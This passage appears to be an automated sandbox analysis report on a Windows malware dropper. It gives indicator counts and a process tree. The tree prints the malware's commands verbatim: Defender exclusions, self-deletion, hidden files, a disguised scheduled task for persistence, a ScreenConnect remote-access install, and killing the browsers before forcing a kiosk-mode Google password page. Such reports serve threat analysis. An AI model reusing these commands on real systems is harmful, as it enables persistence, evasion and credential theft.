pid Process 2140 1V40F8.exe 3744 msiexec.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 3744 msiexec.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 6856 firefox.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 5676 64711675d3.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 6856 firefox.exe 9456 3dbe003be11c428091b74912c836eb73.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3888 wrote to memory of 3952 3888 36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe 83 PID 3888 wrote to memory of 3952 3888 36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe 83 PID 3888 wrote to memory of 3952 3888 36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe 83 PID 3952 wrote to memory of 2356 3952 p6D27.exe 84 PID 3952 wrote to memory of 2356 3952 p6D27.exe 84 PID 3952 wrote to memory of 2356 3952 p6D27.exe 84 PID 2356 wrote to memory of 2140 2356 R5B56.exe 85 PID 2356 wrote to memory of 2140 2356 R5B56.exe 85 PID 2356 wrote to memory of 2140 2356 R5B56.exe 85 PID 2140 wrote to memory of 556 2140 1V40F8.exe 86 PID 2140 wrote to memory of 556 2140 1V40F8.exe 86 PID 2140 wrote to memory of 556 2140 1V40F8.exe 86 PID 2356 wrote to memory of 2332 2356 R5B56.exe 87 PID 2356 wrote to memory of 2332 2356 R5B56.exe 87 PID 2356 wrote to memory of 2332 2356 R5B56.exe 87 PID 3952 wrote to memory of 1412 3952 p6D27.exe 95 PID 3952 wrote to memory of 1412 3952 p6D27.exe 95 PID 3952 wrote to memory of 1412 3952 p6D27.exe 95 PID 556 wrote to memory of 1704 556 skotes.exe 96 PID 556 wrote to memory of 1704 556 skotes.exe 96 PID 556 wrote to memory of 1704 556 skotes.exe 96 PID 3888 wrote to memory of 2336 3888 36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe 97 PID 3888 wrote to memory of 2336 3888 36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe 97 PID 3888 wrote to memory of 2336 3888 36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe 97 PID 556 wrote to memory of 2284 556 skotes.exe 100 PID 556 wrote to memory of 2284 556 skotes.exe 100 PID 556 wrote to memory of 2284 556 skotes.exe 100 PID 2284 wrote to memory of 3144 2284 NN9Dd7c.exe 102 PID 2284 wrote to memory of 3144 2284 NN9Dd7c.exe 102 PID 2284 wrote to memory of 3144 2284 NN9Dd7c.exe 102 PID 556 wrote to memory of 2012 556 skotes.exe 107 PID 556 wrote to memory of 2012 556 skotes.exe 107 PID 556 wrote to memory of 2012 556 skotes.exe 107 PID 2012 wrote to memory of 3744 2012 ga70pjP.exe 108 PID 2012 wrote to memory of 3744 2012 ga70pjP.exe 108 PID 2012 wrote to memory of 3744 2012 ga70pjP.exe 108 PID 2284 wrote to memory of 3388 2284 NN9Dd7c.exe 111 PID 2284 wrote to memory of 3388 2284 NN9Dd7c.exe 111 PID 2284 wrote to memory of 3388 2284 NN9Dd7c.exe 111 PID 4904 wrote to memory of 1292 4904 msiexec.exe 114 PID 4904 wrote to memory of 1292 4904 msiexec.exe 114 PID 4904 wrote to memory of 1292 4904 msiexec.exe 114 PID 1292 wrote to memory of 2832 1292 MsiExec.exe 115 PID 1292 wrote to memory of 2832 1292 MsiExec.exe 115 PID 1292 wrote to memory of 2832 1292 MsiExec.exe 115 PID 556 wrote to memory of 4224 556 skotes.exe 119 PID 556 wrote to memory of 4224 556 skotes.exe 119 PID 556 wrote to memory of 4224 556 skotes.exe 119 PID 2284 wrote to memory of 4528 2284 NN9Dd7c.exe 120 PID 2284 wrote to memory of 4528 2284 NN9Dd7c.exe 120 PID 2284 wrote to memory of 4528 2284 NN9Dd7c.exe 120 PID 2284 wrote to memory of 5076 2284 NN9Dd7c.exe 121 PID 2284 wrote to memory of 5076 2284 NN9Dd7c.exe 121 PID 5076 wrote to memory of 2416 5076 244e0736f6f94ca18cd319153573a00b.exe 123 PID 5076 wrote to memory of 2416 5076 244e0736f6f94ca18cd319153573a00b.exe 123 PID 2416 wrote to memory of 3400 2416 msedge.exe 124 PID 2416 wrote to memory of 3400 2416 msedge.exe 124 PID 2416 wrote to memory of 4212 2416 msedge.exe 125 PID 2416 wrote to memory of 4212 2416 msedge.exe 125 PID 2416 wrote to memory of 4212 2416 msedge.exe 125 PID 2416 wrote to memory of 4212 2416 msedge.exe 125 PID 2416 wrote to memory of 4212 2416 msedge.exe 125 PID 2416 wrote to memory of 4212 2416 msedge.exe 125 PID 2416 wrote to memory of 4212 2416 msedge.exe 125 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 7756 attrib.exe 7836 attrib.exe 4224 attrib.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:3000
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2336
-
-
C:\Users\Admin\AppData\Local\Temp\36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe"C:\Users\Admin\AppData\Local\Temp\36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\p6D27.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\p6D27.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\R5B56.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\R5B56.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1V40F8.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1V40F8.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Users\Admin\AppData\Local\Temp\1017321001\kz8ZdyP.exe"C:\Users\Admin\AppData\Local\Temp\1017321001\kz8ZdyP.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1704 -
C:\Users\Admin\AppData\Local\Temp\1017321001\kz8ZdyP.exe"C:\Users\Admin\AppData\Local\Temp\1017321001\kz8ZdyP.exe"7⤵
- Executes dropped EXE
PID:1316
-
-
C:\Users\Admin\AppData\Local\Temp\1017321001\kz8ZdyP.exe"C:\Users\Admin\AppData\Local\Temp\1017321001\kz8ZdyP.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:400
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\prrhri"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3144
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3388
-
-
C:\prrhri\595994f5cc9c4c769929b462827bc67e.exe"C:\prrhri\595994f5cc9c4c769929b462827bc67e.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4528 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\prrhri\595994f5cc9c4c769929b462827bc67e.exe" & rd /s /q "C:\ProgramData\AS26FU3EKF37" & exit8⤵
- System Location Discovery: System Language Discovery
PID:1936 -
C:\Windows\SysWOW64\timeout.exetimeout /t 109⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4884
-
-
-
-
C:\prrhri\244e0736f6f94ca18cd319153573a00b.exe"C:\prrhri\244e0736f6f94ca18cd319153573a00b.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9MSZ40SLW145?ocid=&referrer=psi8⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffe643e46f8,0x7ffe643e4708,0x7ffe643e47189⤵PID:3400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:29⤵PID:4212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:39⤵
- Suspicious behavior: EnumeratesProcesses
PID:2820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:89⤵PID:3888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:19⤵PID:2560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:19⤵PID:740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:19⤵PID:5576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4104 /prefetch:19⤵PID:5568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:19⤵PID:6936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:19⤵PID:6984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 /prefetch:89⤵PID:7296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 /prefetch:89⤵
- Suspicious behavior: EnumeratesProcesses
PID:6152
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi"7⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3744
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017712001\57dcd7e51c.exe"C:\Users\Admin\AppData\Local\Temp\1017712001\57dcd7e51c.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4224 -
C:\Users\Admin\AppData\Local\Temp\1017712001\57dcd7e51c.exe"C:\Users\Admin\AppData\Local\Temp\1017712001\57dcd7e51c.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7652
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017716001\9a1c193d0b.exe"C:\Users\Admin\AppData\Local\Temp\1017716001\9a1c193d0b.exe"6⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7384
-
-
C:\Users\Admin\AppData\Local\Temp\1017717001\00f883d031.exe"C:\Users\Admin\AppData\Local\Temp\1017717001\00f883d031.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7008 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"7⤵PID:5912
-
C:\Windows\system32\mode.commode 65,108⤵PID:7340
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p24291711423417250691697322505 -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:392
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_7.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3476
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5200
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5564
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7280
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6592
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5384
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4464
-
-
C:\Windows\system32\attrib.exeattrib +H "in.exe"8⤵
- Views/modifies file attributes
PID:7836
-
-
C:\Users\Admin\AppData\Local\Temp\main\in.exe"in.exe"8⤵
- Executes dropped EXE
PID:8124 -
C:\Windows\SYSTEM32\attrib.exeattrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe9⤵
- Views/modifies file attributes
PID:7756
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe9⤵
- Views/modifies file attributes
PID:4224
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE9⤵
- Scheduled Task/Job: Scheduled Task
PID:6580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.0.0.1; del in.exe9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5672 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.110⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6028
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017718001\002e33e6e2.exe"C:\Users\Admin\AppData\Local\Temp\1017718001\002e33e6e2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6380
-
-
C:\Users\Admin\AppData\Local\Temp\1017719001\4320ee3d91.exe"C:\Users\Admin\AppData\Local\Temp\1017719001\4320ee3d91.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5960
-
-
C:\Users\Admin\AppData\Local\Temp\1017720001\64711675d3.exe"C:\Users\Admin\AppData\Local\Temp\1017720001\64711675d3.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5676 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5756
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3564
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6488
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6748
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:7376
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6856 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {df9a0afb-b984-4990-95b1-3973291a7e76} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" gpu9⤵PID:7712
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2456 -parentBuildID 20240401114208 -prefsHandle 2432 -prefMapHandle 2420 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4c87cda-4953-4029-8f18-0d10aaba4349} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" socket9⤵PID:8032
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3448 -childID 1 -isForBrowser -prefsHandle 3440 -prefMapHandle 3436 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2952fa4-cb64-4f1b-a5ef-0ef74a8c5551} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" tab9⤵PID:1036
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3832 -childID 2 -isForBrowser -prefsHandle 3824 -prefMapHandle 3176 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7847304-c413-4931-b1ba-742aef1b0c47} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" tab9⤵PID:6516
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4588 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4616 -prefMapHandle 4612 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14004282-bac4-4290-ace8-f4b37b5193c1} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" utility9⤵
- Checks processor information in registry
PID:5924
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5288 -childID 3 -isForBrowser -prefsHandle 5264 -prefMapHandle 5300 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {05011831-b136-43cd-a3d3-0e87643fa6f3} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" tab9⤵PID:6228
-
-
